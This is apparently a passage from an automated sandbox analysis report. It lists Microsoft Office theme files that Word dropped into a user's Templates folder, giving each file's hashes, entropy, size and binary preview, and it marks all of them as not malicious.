                                                                                                                                                Entropy (8bit):1.2389205950315936
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:zBZ:
                                                                                                                                                MD5:8CC6D97D5F016820D661B4B595D14F18
                                                                                                                                                SHA1:EA6660AC83854E2E7F1C699E92C916EC6753C86F
                                                                                                                                                SHA-256:93AD009496713AE3BE3B2E2F3FBA8BE8D5B7922AC07BB3A51396C894CC1C681E
                                                                                                                                                SHA-512:D99879CB7096BD89A871CD738FD1DE95A150DBEFC50A98FED70964E45C249C74FC79D361CD2B6747071EFAF0667795F836844ECF1D1676938FD3F89EA345FCE5
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:.....$........................

                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03090430[[fn=Banded]].thmx (copy)

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft OOXML
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):562113
                                                                                                                                                Entropy (8bit):7.67409707491542
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12288:/dy5Gtyp/FZ9QqjdxDfSp424XeavSktiAVE0:/dizp1ndpqpMZnV
                                                                                                                                                MD5:4A1657A3872F9A77EC257F41B8F56B3D
                                                                                                                                                SHA1:4DDEA85C649A2C1408B5B08A15DEF49BAA608A0B
                                                                                                                                                SHA-256:C17103ADE455094E17AC182AD4B4B6A8C942FD3ACB381F9A5E34E3F8B416AE60
                                                                                                                                                SHA-512:7A2932639E06D79A5CE1D3C71091890D9E329CA60251E16AE4095E4A06C6428B4F86B7FFFA097BF3EEFA064370A4D51CA3DF8C89EAFA3B1F45384759DEC72922
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:PK..........1AE,.{E...#P......[Content_Types].xml..Mo.0.....Z..N7.=l......V0.-o..j?...H..sa......./UCb.'...r...w.i..e..<[....{2..U.m..N.{...r.....3.fj.o......2.*....;.L.6..&,D.Cld8...a.gZf.......r-v..><....~/......|Zk.......a.R&.d.(.$..6..}.:.....3......1..[.p.....?..+....R...y,.fod.....e...-.|..#..]j....n:...f...-J...i.^.:Y....T..........m^..~GNp../e}...N....a..5.d.8YcN..5.d.8Y...7..A..e...7Q."3...../.sL._...v...n..b..2].v....n.t....Z...Uk...j.&.Z....im|.r....B.....7DaBuN.... ...>..>..>..>..>..>..>.........V}-.....Q}#.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7FaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}..&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7EaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}3.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b.\}..)...A.......[..PK..........1A.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70...........84P....

                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03090434[[fn=Wood Type]].thmx (copy)

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft OOXML
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1649585
                                                                                                                                                Entropy (8bit):7.875240099125746
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24576:L368X6z95zf5BbQ6U79dYy2HiTIxRboyM/LZTl5KnCc:r68kb7UTYxGIxmnp65
                                                                                                                                                MD5:35200E94CEB3BB7A8B34B4E93E039023
                                                                                                                                                SHA1:5BB55EDAA4CDF9D805E36C36FB092E451BDDB74D
                                                                                                                                                SHA-256:6CE04E8827ABAEA9B292048C5F84D824DE3CEFDB493101C2DB207BD4475AF1FD
                                                                                                                                                SHA-512:ED80CEE7C22D10664076BA7558A79485AA39BE80582CEC9A222621764DAE5EFA70F648F8E8C5C83B6FE31C2A9A933C814929782A964A47157505F4AE79A3E2F9
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:PK..........1A..u._....P......[Content_Types].xml..Ms.@.....!...=.7....;a.h.&Y..l..H~..`;...d..g/..e..,M..C...5...#g/."L..;...#. ]..f...w../._.2Y8..X.[..7._.[...K3..#.4......D.]l.?...~.&J&....p..wr-v.r.?...i.d.:o....Z.a|._....|.d...A....A".0.J......nz....#.s.m.......(.]........~..XC..J......+.|...(b}...K!._.D....uN....u..U..b=.^..[...f...f.,...eo..z.8.mz....."..D..SU.}ENp.k.e}.O.N....:^....5.d.9Y.N..5.d.q.^s..}R...._E..D...o..o...o...f.6;s.Z]...Uk6d.j..MW....5[C].f#...l;u.M..Z.../iM|...b...S.....0.zN.... ...>..>..>..>..>..>..>........e...,..7...F(L.....>.ku...i...i...i...i...i...i...i........yi.....G...1.....j...r.Z]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o|^Z....Q}.;.o...9.Z..\.V...............................jZ......k.pT...0.zN.... ...>..>..>..>..>..>..>........e...,..7...f(L.....>.ku...i...i...i...i...i...i...i........yi.......n.....{.._f...0...PK..........1A.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...

                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457444[[fn=Basis]].thmx (copy)

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft OOXML
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):558035
                                                                                                                                                Entropy (8bit):7.696653383430889
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12288:DQ/oYjRRRRRRRRYcdY/5ASWYqBMp8xsGGEOzI7vQQwOyP:DQ/nRRRRRRRRxY/5JWYZ3GGbI8YA
                                                                                                                                                MD5:3B5E44DDC6AE612E0346C58C2A5390E3
                                                                                                                                                SHA1:23BCF3FCB61F80C91D2CFFD8221394B1CB359C87
                                                                                                                                                SHA-256:9ED9AD4EB45E664800A4876101CBEE65C232EF478B6DE502A330D7C89C9AE8E2
                                                                                                                                                SHA-512:2E63419F272C6E411CA81945E85E08A6E3230A2F601C4D28D6312DB5C31321F94FAFA768B16BC377AE37B154C6869CA387005693A79C5AB1AC45ED73BCCC6479
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:PK..........1AE,.{E...#P......[Content_Types].xml..Mo.0.....Z..N7.=l......V0.-o..j?...H..sa......./UCb.'...r...w.i..e..<[....{2..U.m..N.{...r.....3.fj.o......2.*....;.L.6..&,D.Cld8...a.gZf.......r-v..><....~/......|Zk.......a.R&.d.(.$..6..}.:.....3......1..[.p.....?..+....R...y,.fod.....e...-.|..#..]j....n:...f...-J...i.^.:Y....T..........m^..~GNp../e}...N....a..5.d.8YcN..5.d.8Y...7..A..e...7Q."3...../.sL._...v...n..b..2].v....n.t....Z...Uk...j.&.Z....im|.r....B.....7DaBuN.... ...>..>..>..>..>..>..>.........V}-.....Q}#.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7FaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}..&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7EaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}3.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b.\}..)...A.......[..PK..........1A.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70...........84P....

                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457464[[fn=Dividend]].thmx (copy)

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft OOXML
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):570901
                                                                                                                                                Entropy (8bit):7.674434888248144
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6144:D2tTXiO/3GH5SkPQVAqWnGrkFxvay910UUTWZJarUv9TA0g8:kX32H+VWgkFxSgGTmarUv9T
                                                                                                                                                MD5:D676DE8877ACEB43EF0ED570A2B30F0E
                                                                                                                                                SHA1:6C8922697105CEC7894966C9C5553BEB64744717
                                                                                                                                                SHA-256:DF012D101DE808F6CD872DFBB619B16732C23CF4ABC64149B6C3CE49E9EFDA01
                                                                                                                                                SHA-512:F40BADA680EA5CA508947290BA73901D78DE79EAA10D01EAEF975B80612D60E75662BDA542E7F71C2BBA5CA9BA46ECAFE208FD6E40C1F929BB5E407B10E89FBD
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:PK..........1AE,.{E...#P......[Content_Types].xml..Mo.0.....Z..N7.=l......V0.-o..j?...H..sa......./UCb.'...r...w.i..e..<[....{2..U.m..N.{...r.....3.fj.o......2.*....;.L.6..&,D.Cld8...a.gZf.......r-v..><....~/......|Zk.......a.R&.d.(.$..6..}.:.....3......1..[.p.....?..+....R...y,.fod.....e...-.|..#..]j....n:...f...-J...i.^.:Y....T..........m^..~GNp../e}...N....a..5.d.8YcN..5.d.8Y...7..A..e...7Q."3...../.sL._...v...n..b..2].v....n.t....Z...Uk...j.&.Z....im|.r....B.....7DaBuN.... ...>..>..>..>..>..>..>.........V}-.....Q}#.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7FaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}..&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7EaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}3.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b.\}..)...A.......[..PK..........1A.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70...........84P....

                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457475[[fn=Frame]].thmx (copy)

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft OOXML
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):523048
                                                                                                                                                Entropy (8bit):7.715248170753013
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6144:WfmDdN6Zfv8q5rnM6vZ02PtMZRkfW5ipbnMHxVcsOWrCMxy0sD/mcKb4rYEY:xDdQXBrMi2YtggW5ObnMH1brJpUmBU0N
                                                                                                                                                MD5:C276F590BB846309A5E30ADC35C502AD
                                                                                                                                                SHA1:CA6D9D6902475F0BE500B12B7204DD1864E7DD02
                                                                                                                                                SHA-256:782996D93DEBD2AF9B91E7F529767A8CE84ACCC36CD62F24EBB5117228B98F58
                                                                                                                                                SHA-512:B85165C769DFE037502E125A04CFACDA7F7CC36184B8D0A54C1F9773666FFCC43A1B13373093F97B380871571788D532DEEA352E8D418E12FD7AAD6ADB75A150
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:PK..........1AE,.{E...#P......[Content_Types].xml..Mo.0.....Z..N7.=l......V0.-o..j?...H..sa......./UCb.'...r...w.i..e..<[....{2..U.m..N.{...r.....3.fj.o......2.*....;.L.6..&,D.Cld8...a.gZf.......r-v..><....~/......|Zk.......a.R&.d.(.$..6..}.:.....3......1..[.p.....?..+....R...y,.fod.....e...-.|..#..]j....n:...f...-J...i.^.:Y....T..........m^..~GNp../e}...N....a..5.d.8YcN..5.d.8Y...7..A..e...7Q."3...../.sL._...v...n..b..2].v....n.t....Z...Uk...j.&.Z....im|.r....B.....7DaBuN.... ...>..>..>..>..>..>..>.........V}-.....Q}#.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7FaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}..&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7EaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}3.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b.\}..)...A.......[..PK..........1A.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70...........84P....

                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457485[[fn=Mesh]].thmx (copy)

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft OOXML
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):3078052
                                                                                                                                                Entropy (8bit):7.954129852655753
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:49152:bSEjlpY8skyFHuj2yY0ciM9U2NCVBB4YFzYFw7IaJE2VRK+Xn9DOOe9pp9N9Hu:bfp5sksA3cimUVxV05aJE2fKaDOXdN9O
                                                                                                                                                MD5:CDF98D6B111CF35576343B962EA5EEC6
                                                                                                                                                SHA1:D481A70EC9835B82BD6E54316BF27FAD05F13A1C
                                                                                                                                                SHA-256:E3F108DDB3B8581A7A2290DD1E220957E357A802ECA5B3087C95ED13AD93A734
                                                                                                                                                SHA-512:95C352869D08C0FE903B15311622003CB4635DE8F3A624C402C869F1715316BE2D8D9C0AB58548A84BBB32757E5A1F244B1014120543581FDEA7D7D9D502EF9C
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:PK..........1AS'......ip......[Content_Types].xml..n.@.._......8ie'......}.......(y...H}......3Fi..%2.v?..3..._...d=..E.g.....7.i.-.t5.6......}}.m9r.......m...ML.g.M.eV$.r..*.M..l0...A...M..j;.w={o.f..F....i..v......5..d;..D.ySa...M&..qd*w>.O.{h...|w..5.]..'.CS<.:8C}.g.|E.../..>..].Tnml..I.......r.Gv.E....7.;.E......4/l.....6.K.C?1qz.O.v_..r......\c.c.>..lS........X.N.3N.sN..N.)'.%'..'..N.pL.E...T.!..CR....Ie..k.o..M..w.B.0}..3....v..+....,.q..pz.......v{.;....s3.|..V..ZZ......0.[.....x.....!.!~.8.e..n..&.}p....s.i.. ..[]...q.r....~..+.A\...q............e.-)h9..."Z.>...5-C..`..g.}........r.A.+..\...r.>.... .W.\...re?..%.-/hiA..ZR.r.W.D.\}.EK..kZ.>......5..9.&T......Wlu.b....}..+.A\...q......~.WK.Z^..........>.h..`......}.....^h....L...H...!...r.>... .W...\...rE?............-+hIA..\}..r...-}..i..`..G..j..).&T......Wlu.b....}..+.A\...q......~.WK.Z^..........>.h..`......}.....^j..K.L...H...!...r.>... .W...\...rE?............-+hIA..\}..r...-}..i.

                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457491[[fn=Metropolitan]].thmx (copy)

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft OOXML
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):777647
                                                                                                                                                Entropy (8bit):7.689662652914981
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6144:B04bNOJMngI856k0wwOGXMaXTLaTDmfBaN2Tx9iSUk1PdSnc0lnDlcGMcEFYYYYt:xbY6ngI46Aw5dmyYYYYYYYYY7p8d
                                                                                                                                                MD5:B30D2EF0FC261AECE90B62E9C5597379
                                                                                                                                                SHA1:4893C5B9BE04ECBB19EE45FFCE33CA56C7894FE3
                                                                                                                                                SHA-256:BB170D6DE4EE8466F56C93DC26E47EE8A229B9C4842EA8DD0D9CCC71BC8E2976
                                                                                                                                                SHA-512:2E728408C20C3C23C84A1C22DB28F0943AAA960B4436F8C77570448D5BEA9B8D53D95F7562883FA4F9B282DFE2FD07251EEEFDE5481E49F99B8FEDB66AAAAB68
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:PK.........V'B.._<....-.......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c...W..G.4D_.}T,.@...}....R.Z..4k.....Y..mEkLor.f^..O..P...`.../.|u1..Y.....nK.......u=..2.tu~^L.Y5]/...~+.v...o....j.`?.S...../.by.|..>."kZbs....H.9..m.z.]W.V.?~v........;...N.......w....;.z..N.......w.....R.~n..Ofu.-..K.e....{..A.~.8.#D..)o.7..........:2........=......f...u....[..}...u.6b...xz.[...G..|#...$....)J./.......7.............oQ..]^.M........wy}7a.....&l................w.......l._...l..?.A..........r..9.|.8.........{w...........n...]^.M........wy}7a.....&l.................`..z..`.....2.o...wx}.....>..c.M..Arr#.....nD..[.....w......n...]^.M........wy}7a.....&l........w........... ..Fp....w_Q....g..tL.i.?H.o...]^..........n...]^.M........wy}7a.....&l.................`..z..`

                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457496[[fn=Parallax]].thmx (copy)

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):924687
                                                                                                                                                Entropy (8bit):7.824849396154325
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12288:lsadD3eLxI8XSh4yDwFw8oWR+6dmw2ZpQDKpazILv7Jzny/ApcWqyOpEZULn:qLxI8XSh4yUF/oWR+mLKpYIr7l3ZQ7n
                                                                                                                                                MD5:97EEC245165F2296139EF8D4D43BBB66
                                                                                                                                                SHA1:0D91B68CCB6063EB342CFCED4F21A1CE4115C209
                                                                                                                                                SHA-256:3C5CF7BDB27592791ADF4E7C5A09DDE4658E10ED8F47845064DB1153BE69487C
                                                                                                                                                SHA-512:8594C49CAB6FF8385B1D6E174431DAFB0E947A8D7D3F200E622AE8260C793906E17AA3E6550D4775573858EA1243CCBF7132973CD1CF7A72C3587B9691535FF8
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:PK..........1AS'......ip......[Content_Types].xml..n.@.._......8ie'......}.......(y...H}......3Fi..%2.v?..3..._...d=..E.g.....7.i.-.t5.6......}}.m9r.......m...ML.g.M.eV$.r..*.M..l0...A...M..j;.w={o.f..F....i..v......5..d;..D.ySa...M&..qd*w>.O.{h...|w..5.]..'.CS<.:8C}.g.|E.../..>..].Tnml..I.......r.Gv.E....7.;.E......4/l.....6.K.C?1qz.O.v_..r......\c.c.>..lS........X.N.3N.sN..N.)'.%'..'..N.pL.E...T.!..CR....Ie..k.o..M..w.B.0}..3....v..+....,.q..pz.......v{.;....s3.|..V..ZZ......0.[.....x.....!.!~.8.e..n..&.}p....s.i.. ..[]...q.r....~..+.A\...q............e.-)h9..."Z.>...5-C..`..g.}........r.A.+..\...r.>.... .W.\...re?..%.-/hiA..ZR.r.W.D.\}.EK..kZ.>......5..9.&T......Wlu.b....}..+.A\...q......~.WK.Z^..........>.h..`......}.....^h....L...H...!...r.>... .W...\...rE?............-+hIA..\}..r...-}..i..`..G..j..).&T......Wlu.b....}..+.A\...q......~.WK.Z^..........>.h..`......}.....^j..K.L...H...!...r.>... .W...\...rE?............-+hIA..\}..r...-}..i.

                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457503[[fn=Quotable]].thmx (copy)

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft OOXML
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):966946
                                                                                                                                                Entropy (8bit):7.8785200658952
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24576:qBcvGBGhXQir6H1ws6+iU0YuA35VuinHX2NPs:ccvGBGdQ5CsMxQVj3yPs
                                                                                                                                                MD5:F03AB824395A8F1F1C4F92763E5C5CAD
                                                                                                                                                SHA1:A6E021918C3CEFFB6490222D37ECEED1FC435D52
                                                                                                                                                SHA-256:D96F7A63A912CA058FB140138C41DCB3AF16638BA40820016AF78DF5D07FAEDD
                                                                                                                                                SHA-512:0241146B63C938F11045FB9DF5360F63EF05B9B3DD1272A3E3E329A1BFEC5A4A645D5472461DE9C06CFE4ADB991FE96C58F0357249806C341999C033CD88A7AF
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:PK..........1A.......F`......[Content_Types].xml..n.@.._.y.ac $..,........-..g@.u.G.+t.:........D1...itgt>...k..lz;].8Kg^....N.l..........0.~}....ykk.A`..N..\...2+.e.c..r..P+....I.e.......|.^/.vc{......s..z....f^...8...'.zcN&.<....}.K.'h..X..y.c.qnn.s%...V('~v.W.......I%nX`.....G.........r.Gz.E..M.."..M....6n.a..V.K6.G?Qqz..............\e.K.>..lkM...`...k.5...sb.rbM8..8..9..pb..R..{>$..C.>......X..iw.'..a.09CPk.n...v....5n..Uk\...SC...j.Y.....Vq..vk>mi......z..t....v.]...n...e(.....s.i......]...q.r....~.WV/.j.Y......K..-.. Z..@.\.P..W...A..X8.`$C.F(.P..H...W..r.>... .W.C..zAV+.....@.\..h....r)...R..-..........c..0F...@Z.....v.+.A\...q.......ZAV'p)...R.D....K..-...h....eP..........(.P..H...W..r.>... .W.C..zAV+.....@.\..h....r)...R..-.............0A...@Z.....v.+.A\...q.......ZAV'p)...R.D....K..-...h....eP.........w(.P..H...W..r.>... .W.C..zAV+.....@.\..h....r)...R..-..........T..GI..~.....~....PK..........1A.s@.....O......._rels/.rels...J.

                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457510[[fn=Savon]].thmx (copy)

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft OOXML
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1204049
                                                                                                                                                Entropy (8bit):7.92476783994848
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24576:+3zSQBxvOUIpHLYTCEmS1Wu09jRalJP3sdgnmAOFt0zU4L0MRx5QNn5:+bvI5UTCPu09qP3JPOFoR4N5
                                                                                                                                                MD5:FD5BBC58056522847B3B75750603DF0C
                                                                                                                                                SHA1:97313E85C0937739AF7C7FC084A10BF202AC9942
                                                                                                                                                SHA-256:44976408BD6D2703BDBE177259061A502552193B1CD05E09B698C0DAC3653C5F
                                                                                                                                                SHA-512:DBD72827044331215A7221CA9B0ECB8809C7C79825B9A2275F3450BAE016D7D320B4CA94095F7CEF4372AC63155C78CA4795E23F93166D4720032ECF9F932B8E
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:PK..........1A..d T....P......[Content_Types].xml..Ms.@.....!...=.7....kX 5o.,L..<..........d..g/..dw.]...C...9...#g/."L..;...#. ]..f...w../._.3Y8..X.[..7._.[...K3..3.4......D.]l.?...~.&J&...s...;...H9...e.3.q.....k-.0>Lp:.7..eT...Y...P...OVg.....G..).aV...\Z.x...W.>f...oq.8.....I?Ky...g..."...J?....A$zL.].7.M.^..\....C..d/;.J0.7k.X4.e..?N{....r.."LZx.H?. ......;r.+...A<.;U.....4...!'k...s.&..)'k...d..d......._E..D...o..o...o...f.7;s..]...Uk6d.j..MW....5[C].f#...l;u.M..Z.../iM|...b...s.....0..O.... ...>..>..>..>..>..>..>.........2V}......Q}#.&T...rU....\..\..\..\..\..\..\..\.W..W.^Z....Q}c;.o...>.Z..\.v...............................*Z....K.X.5X8.obG.MP.P.'P.U}.k..rU..rU..rU..rU..rU..rU..rU..rU_EK_}.zi.....G.M.).....j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..h.oZ/-c..`....7CaBu.@-W.A.]..U}H.U}H.U}H.U}H.U}H.U}H.U}H.U}.-}...e...,...|...].k.........PK..........1A.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70...

                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457515[[fn=View]].thmx (copy)

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft OOXML
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):486596
                                                                                                                                                Entropy (8bit):7.668294441507828
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6144:A+JBmUx0Zo24n8z/2NSYFl2qGBuv8p6+LwwYmN59wBttsdJrmXMlP1NwQoGgeL:fNgxz/g5z2BT6+Eu0ntMcczNQG5L
                                                                                                                                                MD5:0E37AECABDB3FDF8AAFEDB9C6D693D2F
                                                                                                                                                SHA1:F29254D2476DF70979F723DE38A4BF41C341AC78
                                                                                                                                                SHA-256:7AC7629142C2508B070F09788217114A70DE14ACDB9EA30CBAB0246F45082349
                                                                                                                                                SHA-512:DE6AFE015C1D41737D50ADD857300996F6E929FED49CB71BC59BB091F9DAB76574C56DEA0488B0869FE61E563B07EBB7330C8745BC1DF6305594AC9BDEA4A6BF
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:PK.........V'BE,.{....#P......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c...W..G.4D_.}T,.@...}....R.Z..4k.....Y..mEkLor.f^..O..P...`.../.|u1..Y.....nK.......u=..2.tu~^L.Y5]/...~+.v...o....j.`?.S...../.by.|..>."kZbs....H.9..m.z.]W.V.?~v........;...N.......w....;.z..N.......w.....R.~n..Ofu.-..K.e....{..A.~.8.#D..)o.7..........:2........=......f...u....[..}...u.6b...xz.[...G..|#...$....)J./.......7.............oQ..]^.M........wy}7a.....&l................w.......l._...l..?.A..........r..9.|.8.........{w...........n...]^.M........wy}7a.....&l.................`..z..`.....2.o...wx}.....>..c.M..Arr#.....nD..[.....w......n...]^.M........wy}7a.....&l........w........... ..Fp....w_Q....g..tL.i.?H.o...]^..........n...]^.M........wy}7a.....&l.................`..z..`

                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033917[[fn=Berlin]].thmx (copy)

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft OOXML
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):976001
                                                                                                                                                Entropy (8bit):7.791956689344336
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24576:zHM7eZGgFiHMRej4N9tpytNZ+tIw5ErZBImlX0m:zHM7eZGgFiHMRej++NZ+F5WvllZ
                                                                                                                                                MD5:9E563D44C28B9632A7CF4BD046161994
                                                                                                                                                SHA1:D3DB4E5F5B1CC6DD08BB3EBF488FF05411348A11
                                                                                                                                                SHA-256:86A70CDBE4377C32729FD6C5A0B5332B7925A91C492292B7F9C636321E6FAD86
                                                                                                                                                SHA-512:8EB14A1B10CB5C7607D3E07E63F668CFC5FC345B438D39138D62CADF335244952FBC016A311D5CB8A71D50660C49087B909528FC06C1D10AF313F904C06CBD5C
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:PK.........{MB.f}......p......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.v...(=.v........F_..U..G...T.e.y)[..b.......3.m....6.X5.P........_...b../..}.-......~.-..z..d.......j.^.+c..E.V..~3}..U.7..~p.>.E..9^d....4%}.E.$....N..r....<....%...%.?....w.u...h........D...w.....h........Dkw...x..T....T....T....T....T....T....j...."[.J.....;..!4...M...............t.n-.{..skp...[;.......F...j.7...4fC...K1..K/..K-..K+..K)..K'..f9......Fl._.........d0...?7K7].........A.......Fl.............Ft....u.......Ft........\.......w....R.......R.......R........o...].`.....A....#.`..\.....S.._...4...o.........W<x#..............w#...r.nD..]....\.~....|......b...^...Z...V...R...N..W<x......l._...l..?.A......xp_Q..y<h..tL.i.?HNn...]..........r.nD..]~.........wy~7......Ft...........E/|c.

                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033919[[fn=Circuit]].thmx (copy)

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1463634
                                                                                                                                                Entropy (8bit):7.898382456989258
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24576:75MGNW/UpLkupMAqDJhNHK4/TuiKbdhbZM+byLH/:7ZwUpLkulkHK46iiDZHeLH/
